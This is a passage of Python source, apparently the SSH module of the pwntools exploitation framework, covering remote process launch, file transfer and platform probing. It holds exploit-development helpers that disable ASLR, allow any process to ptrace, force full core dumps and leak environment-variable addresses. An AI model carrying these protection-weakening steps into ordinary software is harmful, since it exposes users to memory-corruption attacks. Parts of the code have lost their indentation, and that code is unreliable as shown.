self.error("executable / argv[0] must be a string: %r" % executable)
executable = context._decode(executable)
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
try:
integer_types = int, long
except NameError:
integer_types = int,
exe = %(executable)r
argv = [bytes(a) for a in %(argv)r]
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
env = OrderedDict((bytes(k), bytes(v)) for k,v in env)
os.environ.clear()
getattr(os, 'environb', os.environ).update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
sys.stdout.write(os.path.realpath(exe) + '\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
os.close(fd)
elif isinstance(newfd, (str, bytes)):
newfd = os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
os.dup2(newfd, fd)
os.close(newfd)
elif isinstance(newfd, integer_types) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
%(func_name)s(*%(func_args)r)
os.execve(exe, argv, env)
""" % locals()
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
if timeout == Timeout.default:
timeout = self.timeout
with self.progress(msg) as h:
script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.quiet:
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=timeout)
try:
result = safeeval.const(python.recvline())
except (EOFError, ValueError):
h.failure("Process creation failed")
self.warn_once('Could not find a Python interpreter on %s\n' % self.host \
+ "Use ssh.run() instead of ssh.process()")
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = context._decode(python.recvuntil(b'\x00')[:-1])
h.success('pid %i' % python.pid)
if not aslr and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
    """which(program) -> str

    Resolve ``program`` on the remote system, like ``which(1)``, with the
    remote working directory appended to the end of ``$PATH``.

    Arguments:
        program(str): Name of the binary, or a path to it.

    Returns:
        The remote path to the binary, or :const:`None` if it cannot be found.
    """
    # If the name already looks like a path, do not attempt to resolve it.
    # Check '/' explicitly as well: the remote end is a POSIX shell even
    # when the *local* os.path.sep differs (e.g. running from Windows).
    if os.path.sep in program or '/' in program:
        return program

    result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip().decode()

    # `which` may emit an error message instead of a path; only accept
    # output that actually contains "/<program>".
    if ('/%s' % program) not in result:
        return None

    return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
    r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel

    Spawn ``process`` inside a fresh channel on the remote host.  A TTY is
    requested when `tty` is True; when `raw` is True, terminal control codes
    are ignored and input is not echoed back.

    Returns a :class:`pwnlib.tubes.ssh.ssh_channel` object.

    Examples:
        >>> s = ssh(host='example.pwnme')
        >>> py = s.run('python -i')
        >>> _ = py.recvuntil(b'>>> ')
        >>> py.sendline(b'print(2+2)')
        >>> py.sendline(b'exit')
        >>> print(repr(py.recvline()))
        b'4\n'
        >>> s.system('env | grep -a AAAA', env={'AAAA': b'\x90'}).recvall()
        b'AAAA=\x90\n'
    """
    # Fall back to the connection-wide defaults when unspecified.
    wd = self.cwd if wd is None else wd
    timeout = self.timeout if timeout is None else timeout

    return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)

#: Backward compatibility.  Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
    """Retrieve the address of an environment variable on the remote
    system.

    Note:
        The exact address will differ based on what other environment
        variables are set, as well as argv[0].  In order to ensure that
        the path is *exactly* the same, it is recommended to invoke the
        process with ``argv=[]``.
    """
    # Tiny remote Python snippet: prints the address returned by libc's
    # getenv(3) for the requested variable name.
    script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable

    with context.local(log_level='error'):
        python = self.which('python')

        if not python:
            self.error("Python is not installed on the remote system.")

        # argv[0] is deliberately empty so the environment layout matches a
        # target process started with argv=[] (see the Note above).
        io = self.process(['','-c', script.strip()], executable=python, **kwargs)
        result = io.recvall()

    try:
        # Mask the printed value down to the configured pointer width.
        return int(result) & context.mask
    except ValueError:
        self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
    r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str

    Execute a command on the remote server and block until it finishes,
    returning a ``(output, exit_status)`` tuple.  With `tty` set, the
    command runs inside a pseudo-terminal.

    Examples:
        >>> s = ssh(host='example.pwnme')
        >>> print(s.run_to_end('echo Hello; exit 17'))
        (b'Hello\n', 17)
    """
    # Silence the channel's own logging while we consume everything.
    with context.local(log_level = 'ERROR'):
        channel = self.run(process, tty, wd = wd, timeout = Timeout.default)
        output = channel.recvall()
        status = channel.wait()
        channel.close()

    return output, status
def connect_remote(self, host, port, timeout = Timeout.default):
    r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter

    Open a TCP connection from the remote host to ``host:port``, tunnelled
    over this SSH session.  This is equivalent to using the ``-L`` flag on
    ``ssh``.

    Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.

    Examples:
        >>> from pwn import *
        >>> l = listen()
        >>> s = ssh(host='example.pwnme')
        >>> a = s.connect_remote(s.host, l.lport)
        >>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
        >>> a.sendline(b'Hello')
        >>> print(repr(b.recvline()))
        b'Hello\n'
    """
    connecter = ssh_connecter(self, host, port, timeout, level=self.level)
    return connecter

remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
    r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter

    Listen on a port on the remote host, tunnelled over this SSH session.
    This is equivalent to using the ``-R`` flag on ``ssh``.

    Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.

    Examples:
        >>> from pwn import *
        >>> s = ssh(host='example.pwnme')
        >>> l = s.listen_remote()
        >>> a = remote(s.host, l.port)
        >>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
        >>> a.sendline(b'Hello')
        >>> print(repr(b.recvline()))
        b'Hello\n'
    """
    listener = ssh_listener(self, bind_address, port, timeout, level=self.level)
    return listener

listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s['echo hello']))
b'hello'
"""
return self.__getattr__(attr)()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s('echo hello')))
b'hello'
"""
return self.__getattr__(attr)()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> s.echo('hello')
b'hello'
>>> s.whoami()
b'travis'
>>> s.echo(['huh','yay','args'])
b'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr] + args[0]
else:
command = ' '.join((attr,) + args)
return self.run(command).recvall().strip()
return runner
def connected(self):
    """Returns True if we are connected.

    Example:
        >>> s = ssh(host='example.pwnme')
        >>> s.connected()
        True
        >>> s.close()
        >>> s.connected()
        False
    """
    if not self.client:
        return False
    # paramiko's SSHClient.get_transport() returns None when no session is
    # established; the original code would raise AttributeError on
    # None.is_active() in that state.
    transport = self.client.get_transport()
    return bool(transport and transport.is_active())
def close(self):
    """Close the connection."""
    # Idempotent: a second call is a no-op once client has been cleared.
    if not self.client:
        return
    self.client.close()
    self.client = None
    self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
    """Return a dictionary of the libraries used by a remote file."""
    escaped = sh_string(remote)

    # First verify ldd works on the file, then prefer the dynamic-loader
    # trace (LD_TRACE_LOADED_OBJECTS) with a plain ldd fallback.  Errors
    # from either are discarded.
    cmd = ('(ulimit -s unlimited;'
           'ldd %(bin)s > /dev/null &&'
           '(LD_TRACE_LOADED_OBJECTS=1 %(bin)s||'
           'ldd %(bin)s)) 2>/dev/null') % {'bin': escaped}

    data, status = self.run_to_end(cmd)
    if status != 0:
        self.error('Unable to find libraries for %r' % remote)
        return {}

    return misc.parse_ldd_output(context._decode(data))
def _get_fingerprint(self, remote):
    """Return the remote file's SHA-256 hex digest, or None on failure."""
    # Try each available SHA-256 tool; redirect the file through stdin so
    # the tool never prints the filename.
    cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
    cmd = cmd + sh_string(remote)

    data, status = self.run_to_end(cmd)
    if status != 0:
        return None

    # Normalize the possible output formats down to the bare digest:
    #   openssl:           "(stdin)= e3b0c442..."
    #   sha256/sha256sum:  "e3b0c442...  -"
    for junk in (b'(stdin)= ', b'-'):
        data = data.replace(junk, b'')
    data = data.strip()

    if isinstance(data, bytes):
        data = data.decode('ascii')
    return data
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
def _download_raw(self, remote, local, h):
    """Download ``remote`` to the local path ``local``, reporting progress
    on the log handle ``h``.  Prefers SFTP and falls back to streaming the
    file through a remote ``cat`` when SFTP is unavailable or fails.
    """
    # Progress callback shared by both transport paths.
    def update(has, total):
        h.status("%s/%s" % (misc.size(has), misc.size(total)))

    if self.sftp:
        try:
            self.sftp.get(remote, local, update)
            return
        except IOError:
            # Fall through to the shell-based transfer below.
            pass

    # Learn the file size up front so progress can be reported.
    cmd = 'wc -c < ' + sh_string(remote)
    total, exitcode = self.run_to_end(cmd)

    if exitcode != 0:
        h.error("%r does not exist or is not accessible" % remote)
        return

    total = int(total)

    with context.local(log_level = 'ERROR'):
        cmd = 'cat < ' + sh_string(remote)
        c = self.run(cmd)
        data = b''

        # Accumulate until EOF, updating the progress meter per chunk.
        while True:
            try:
                data += c.recv()
            except EOFError:
                break
            update(len(data), total)

        # A non-zero exit status means the remote cat failed mid-stream.
        result = c.wait()
        if result != 0:
            h.failure('Could not download file %r (%r)' % (remote, result))
            return

    with open(local, 'wb') as fd:
        fd.write(data)
def _download_to_cache(self, remote, p):
    """Download ``remote`` into the local cache directory and return the
    local path.  Cached copies are reused when their SHA-256 still matches.
    """
    with context.local(log_level='error'):
        # readlink runs remotely (dispatched via __getattr__); -f resolves
        # the canonical path through any symlinks.
        remote = self.readlink('-f',remote)
    if not hasattr(remote, 'encode'):
        remote = remote.decode('utf-8')

    fingerprint = self._get_fingerprint(remote)
    if fingerprint is None:
        # No usable remote hashing tool: fall back to an uncached,
        # timestamp-suffixed download.
        local = os.path.normpath(remote)
        local = os.path.basename(local)
        local += time.strftime('-%Y-%m-%d-%H:%M:%S')
        local = os.path.join(self._cachedir, local)

        self._download_raw(remote, local, p)
        return local

    local = self._get_cachefile(fingerprint)

    if self.cache and self._verify_local_fingerprint(fingerprint):
        p.success('Found %r in ssh cache' % remote)
    else:
        self._download_raw(remote, local, p)

        # Re-verify: the download must hash to the expected fingerprint.
        if not self._verify_local_fingerprint(fingerprint):
            p.error('Could not download file %r' % remote)

    return local
def download_data(self, remote):
    """Downloads a file from the remote server and returns it as a string.

    Arguments:
        remote(str): The remote filename to download.

    Examples:
        >>> with open('/tmp/bar','w+') as f:
        ...     _ = f.write('Hello, world')
        >>> s = ssh(host='example.pwnme',
        ...         cache=False)
        >>> s.download_data('/tmp/bar')
        b'Hello, world'
        >>> s._sftp = None
        >>> s._tried_sftp = True
        >>> s.download_data('/tmp/bar')
        b'Hello, world'
    """
    # Fetch (or reuse) the cached copy, then read it back wholesale.
    with self.progress('Downloading %r' % remote) as p:
        cached_path = self._download_to_cache(remote, p)
        with open(cached_path, 'rb') as fd:
            return fd.read()
def download_file(self, remote, local = None):
    """Downloads a file from the remote server.

    The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
    calling the function twice has little overhead.

    Arguments:
        remote(str): The remote filename to download
        local(str): The local filename to save it to.  Default is to infer it from the remote filename.
    """
    if not local:
        local = os.path.basename(os.path.normpath(remote))

    # A bare filename is interpreted relative to the remote working directory.
    if os.path.basename(remote) == remote:
        remote = os.path.join(self.cwd, remote)

    with self.progress('Downloading %r to %r' % (remote, local)) as p:
        local_tmp = self._download_to_cache(remote, p)

    # Check to see if an identical copy of the file already exists;
    # only copy out of the cache when the content actually differs.
    if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
        shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
    """Recursively downloads a directory from the remote server.

    The directory is packed into a tarball on the remote end, downloaded
    once, and extracted locally (under ``local/<basename>``).

    Arguments:
        local: Local directory
        remote: Remote directory
    """
    remote = remote or self.cwd

    # Canonicalize the remote path (resolving symlinks).
    if self.sftp:
        remote = str(self.sftp.normalize(remote))
    else:
        # FIX: previously the ssh_channel object itself was assigned to
        # `remote` instead of the command's decoded output.
        with context.local(log_level='error'):
            remote = context._decode(
                self.system('readlink -f ' + sh_string(remote)).recvall().strip())

    # FIX: tar must run from the *parent* directory so that `basename`
    # names an existing entry; `-C remote` looked for remote/basename.
    dirname = os.path.dirname(remote)
    basename = os.path.basename(remote)

    local = local or '.'
    local = os.path.expanduser(local)

    self.info("Downloading %r to %r" % (basename,local))

    with context.local(log_level='error'):
        remote_tar = self.mktemp()
        cmd = 'tar -C %s -czf %s %s' % \
            (sh_string(dirname),
             sh_string(remote_tar),
             sh_string(basename))

        tar = self.system(cmd)

        if 0 != tar.wait():
            self.error("Could not create remote tar")

        local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
        self.download_file(remote_tar, local_tar.name)

        # Close the archive when done instead of leaking the handle.
        with tarfile.open(local_tar.name) as tar:
            tar.extractall(local)
def upload_data(self, data, remote):
    """Uploads some data into a file on the remote server.

    Arguments:
        data(str): The data to upload.
        remote(str): The filename to upload it to.

    Example:
        >>> s = ssh(host='example.pwnme')
        >>> s.upload_data(b'Hello, world', '/tmp/upload_foo')
        >>> print(open('/tmp/upload_foo').read())
        Hello, world
        >>> s._sftp = False
        >>> s._tried_sftp = True
        >>> s.upload_data(b'Hello, world', '/tmp/upload_bar')
        >>> print(open('/tmp/upload_bar').read())
        Hello, world
    """
    data = context._encode(data)

    # If a relative path was provided, prepend the cwd
    if os.path.normpath(remote) == os.path.basename(remote):
        remote = os.path.join(self.cwd, remote)

    # Fast path: stage the data in a local temp file and SFTP it across.
    if self.sftp:
        with tempfile.NamedTemporaryFile() as f:
            f.write(data)
            f.flush()
            self.sftp.put(f.name, remote)
            return

    # Fallback: pipe the bytes into a remote `cat > file`.
    with context.local(log_level = 'ERROR'):
        cmd = 'cat > ' + sh_string(remote)
        s = self.run(cmd, tty=False)
        s.send(data)
        # Half-close the channel so cat sees EOF and exits.
        s.shutdown('send')
        data = s.recvall()
        result = s.wait()
        if result != 0:
            self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
    """Uploads a file to the remote server.  Returns the remote filename.

    Arguments:
        filename(str): The local filename to download
        remote(str): The remote filename to save it to.  Default is to infer it from the local filename."""
    if remote is None:
        # Keep only the basename and place it in the working directory.
        remote = os.path.join(self.cwd, os.path.basename(os.path.normpath(filename)))

    with open(filename, 'rb') as fd:
        data = fd.read()

    self.info("Uploading %r to %r" % (filename,remote))
    self.upload_data(data, remote)

    return remote
def upload_dir(self, local, remote=None):
    """Recursively uploads a directory onto the remote server.

    The directory is packed into a local tarball, uploaded once, and
    extracted on the remote end.

    Arguments:
        local: Local directory
        remote: Remote directory
    """
    remote = remote or self.cwd

    local = os.path.expanduser(local)
    basename = os.path.basename(local)

    if not os.path.isdir(local):
        self.error("%r is not a directory" % local)

    msg = "Uploading %r to %r" % (basename,remote)
    with self.waitfor(msg):
        # Generate a tarfile with everything inside of it.
        # SECURITY FIX: tempfile.mktemp() is race-prone (another process
        # can claim the predicted name); use mkstemp() instead.
        fd, local_tar = tempfile.mkstemp(suffix='.tar.gz')
        try:
            os.close(fd)
            with tarfile.open(local_tar, 'w:gz') as tar:
                tar.add(local, basename)

            # Upload and extract it
            with context.local(log_level='error'):
                remote_tar = self.mktemp('--suffix=.tar.gz')
                self.upload_file(local_tar, remote_tar)

                untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
                message = untar.recvrepeat(2)

                if untar.wait() != 0:
                    self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
        finally:
            # Don't leave the staging archive behind in the temp dir.
            os.unlink(local_tar)
def upload(self, file_or_directory, remote=None):
    """upload(file_or_directory, remote=None)

    Upload a file or directory to the remote host.

    Arguments:
        file_or_directory(str): Path to the file or directory to download.
        remote(str): Local path to store the data.
            By default, uses the working directory.
    """
    if isinstance(file_or_directory, str):
        # Expand ~user first, then $VARS, before probing the path.
        file_or_directory = os.path.expandvars(os.path.expanduser(file_or_directory))

    if os.path.isfile(file_or_directory):
        return self.upload_file(file_or_directory, remote)
    if os.path.isdir(file_or_directory):
        return self.upload_dir(file_or_directory, remote)

    self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
    """download(file_or_directory, local=None)

    Download a file or directory from the remote host.

    Arguments:
        file_or_directory(str): Path to the file or directory to download.
        local(str): Local path to store the data.
            By default, uses the current directory.
    """
    if not self.sftp:
        self.error("Cannot determine remote file type without SFTP")

    # `test -d` exits 0 when the remote path is a directory.
    with self.system('test -d ' + sh_string(file_or_directory)) as io:
        is_directory = (io.wait() == 0)

    if is_directory:
        self.download_dir(file_or_directory, local)
    else:
        self.download_file(file_or_directory, local)

put = upload
get = download
def unlink(self, file):
    """unlink(file)

    Delete the file on the remote host

    Arguments:
        file(str): Path to the file
    """
    # There is no shell fallback here: removal requires SFTP.
    if not self.sftp:
        self.error("unlink() is only supported if SFTP is supported")
    return self.sftp.unlink(file)
def libs(self, remote, directory = None):
    """Downloads the libraries referred to by a file.

    This is done by running ldd on the remote server, parsing the output
    and downloading the relevant files.

    The directory argument specified where to download the files.  This defaults
    to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server.

    Returns a dict mapping each downloaded local path to the library's
    load address (0 for the target binary itself).
    """
    libs = self._libs_remote(remote)

    # Include the target binary itself, keyed by its canonical path.
    remote = context._decode(self.readlink('-f',remote).strip())
    libs[remote] = 0

    if directory is None:
        directory = self.host

    directory = os.path.realpath(directory)

    res = {}
    seen = set()

    for lib, addr in libs.items():
        # Containment check: realpath() collapses any '..' components, so
        # a malicious ldd entry cannot escape the download directory.
        local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
        if not local.startswith(directory):
            self.warning('This seems fishy: %r' % lib)
            continue

        misc.mkdir_p(os.path.dirname(local))

        # Download each distinct library only once.
        if lib not in seen:
            self.download_file(lib, local)
            seen.add(lib)
        res[local] = addr

    return res
def interactive(self, shell=None):
    """Create an interactive session.

    This is a simple wrapper for creating a new
    :class:`pwnlib.tubes.ssh.ssh_channel` object and calling
    :meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
    channel = self.shell(shell)

    # Start the interactive shell in the session's working directory.
    if self.cwd != '.':
        channel.sendline('cd ' + sh_string(self.cwd))

    channel.interactive()
    channel.close()
def set_working_directory(self, wd = None, symlink = False):
    """Sets the working directory in which future commands will
    be run (via ssh.run) and to which files will be uploaded/downloaded
    from if no path is provided

    Note:
        This uses ``mktemp -d`` under the covers, sets permissions
        on the directory to ``0700``.  This means that setuid binaries
        will **not** be able to access files created in this directory.

        In order to work around this, we also ``chmod +x`` the directory.

    Arguments:
        wd(string): Working directory.  Default is to auto-generate a directory
            based on the result of running 'mktemp -d' on the remote machine.
        symlink(bool,str): Create symlinks in the new directory.

            The default value, ``False``, implies that no symlinks should be
            created.

            A string value is treated as a path that should be symlinked.
            It is passed directly to the shell on the remote end for expansion,
            so wildcards work.

            Any other value is treated as a boolean, where ``True`` indicates
            that all files in the "old" working directory should be symlinked.

    Examples:
        >>> s = ssh(host='example.pwnme')
        >>> cwd = s.set_working_directory()
        >>> s.ls()
        b''
        >>> s.pwd() == cwd
        True

        >>> s = ssh(host='example.pwnme')
        >>> homedir = s.pwd()
        >>> _=s.touch('foo')

        >>> _=s.set_working_directory()
        >>> assert s.ls() == b''

        >>> _=s.set_working_directory(homedir)
        >>> assert b'foo' in s.ls().split()

        >>> _=s.set_working_directory(symlink=True)
        >>> assert b'foo' in s.ls().split()
        >>> assert homedir != s.pwd()

        >>> symlink=os.path.join(homedir,b'*')
        >>> _=s.set_working_directory(symlink=symlink)
        >>> assert b'foo' in s.ls().split()
        >>> assert homedir != s.pwd()
    """
    status = 0

    # A non-string truthy symlink means "symlink everything from the old
    # working directory" — expand it to a shell glob over the current cwd.
    if symlink and not isinstance(symlink, (six.binary_type, six.text_type)):
        symlink = os.path.join(self.pwd(), b'*')

    # Normalize bytes to text so the shell command below is well-formed.
    if not hasattr(symlink, 'encode') and hasattr(symlink, 'decode'):
        symlink = symlink.decode('utf-8')

    if not wd:
        # chmod +x so setuid binaries can still traverse into the
        # freshly-created 0700 directory (see Note above).
        wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
        wd = wd.strip()

        if status:
            self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))

    else:
        # Sanity-check that the requested directory exists before adopting it.
        cmd = b'ls ' + sh_string(wd)
        _, status = self.run_to_end(cmd, wd = '.')

        if status:
            self.error("%r does not appear to exist" % wd)

    # Store cwd as text even when the shell handed us bytes.
    self.cwd = wd
    if not isinstance(wd, str):
        self.cwd = wd.decode('utf-8')

    self.info("Working directory: %r" % self.cwd)

    if symlink:
        self.ln('-s', symlink, '.')

    return wd
def write(self, path, data):
    """Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
    # Note the argument-order swap: misc.write takes (path, data).
    return self.upload_data(data, path)
def read(self, path):
    """Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
    return self.download_data(path)
def _init_remote_platform_info(self):
    r"""Fills _platform_info, e.g.:

    ::

        {'distro': 'Ubuntu\n',
         'distro_ver': '14.04\n',
         'machine': 'x86_64',
         'node': 'pwnable.kr',
         'processor': 'x86_64',
         'release': '3.11.0-12-generic',
         'system': 'linux',
         'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
    """
    # Already probed once; the info is cached for the session.
    if self._platform_info:
        return

    # Runs on the remote side before exec'ing 'true': prints one uname
    # field per line, which we read back in the same order below.
    def preexec():
        import platform
        print('\n'.join(platform.uname()))

    with context.quiet:
        with self.process('true', preexec_fn=preexec) as io:
            self._platform_info = {
                'system': io.recvline().lower().strip().decode(),
                'node': io.recvline().lower().strip().decode(),
                'release': io.recvline().lower().strip().decode(),
                'version': io.recvline().lower().strip().decode(),
                'machine': io.recvline().lower().strip().decode(),
                'processor': io.recvline().lower().strip().decode(),
                'distro': 'Unknown',
                'distro_ver': ''
            }

        # Best effort: lsb_release provides a nicer distro name/version.
        try:
            if not self.which('lsb_release'):
                return
            with self.process(['lsb_release', '-irs']) as io:
                lsb_info = io.recvall().strip().decode()
            self._platform_info['distro'], self._platform_info['distro_ver'] = lsb_info.split()
        except Exception:
            pass
@property
def os(self):
    """:class:`str`: Operating System of the remote machine."""
    try:
        self._init_remote_platform_info()
        system = self._platform_info['system']
    except Exception:
        return "Unknown"
    try:
        # Let context normalize the raw uname value into its os name.
        with context.local(os=system):
            return context.os
    except Exception:
        return "Unknown"
@property
def arch(self):
    """:class:`str`: CPU Architecture of the remote machine."""
    try:
        self._init_remote_platform_info()
        machine = self._platform_info['machine']
    except Exception:
        return "Unknown"
    try:
        # Let context normalize the raw uname machine into its arch name.
        with context.local(arch=machine):
            return context.arch
    except Exception:
        return "Unknown"
@property
def bits(self):
    """:class:`str`: Pointer size of the remote machine."""
    try:
        with context.local():
            # clear() first so that assigning arch also re-derives bits.
            context.clear()
            context.arch = self.arch
            return context.bits
    except Exception:
        # Unknown remote arch: fall back to the local context's belief.
        return context.bits
@property
def version(self):
    """:class:`tuple`: Kernel version of the remote machine."""
    try:
        self._init_remote_platform_info()
        release = self._platform_info['release']
        # Pull the leading dotted-numeric part out of e.g.
        # '3.11.0-12-generic'.
        match = re.search(r'([0-9]+\.?)+', release)
        return tuple(int(part) for part in match.group().split('.'))
    except Exception:
        return (0,0,0)
@property
def distro(self):
    """:class:`tuple`: Linux distribution name and release."""
    try:
        self._init_remote_platform_info()
        info = self._platform_info
        return (info['distro'], info['distro_ver'])
    except Exception:
        return ("Unknown", "Unknown")
@property
def aslr(self):
    """:class:`bool`: Whether ASLR is enabled on the system.

    Example:
        >>> s = ssh("travis", "example.pwnme")
        >>> s.aslr
        True
    """
    # Cached after the first probe.
    if self._aslr is not None:
        return self._aslr

    if self.os != 'linux':
        self.warn_once("Only Linux is supported for ASLR checks.")
        self._aslr = False
        return self._aslr

    # A leading '0' in randomize_va_space means ASLR is fully disabled.
    with context.quiet:
        rvs = self.read('/proc/sys/kernel/randomize_va_space')

    self._aslr = not rvs.startswith(b'0')
    return self._aslr
@property
def aslr_ulimit(self):
    """:class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
    import pwnlib.elf.elf
    import pwnlib.shellcraft

    # Cached after the first (fairly expensive) remote probe.
    if self._aslr_ulimit is not None:
        return self._aslr_ulimit

    # This test must run a 32-bit binary, fix the architecture
    arch = {
        'amd64': 'i386',
        'aarch64': 'arm'
    }.get(self.arch, self.arch)

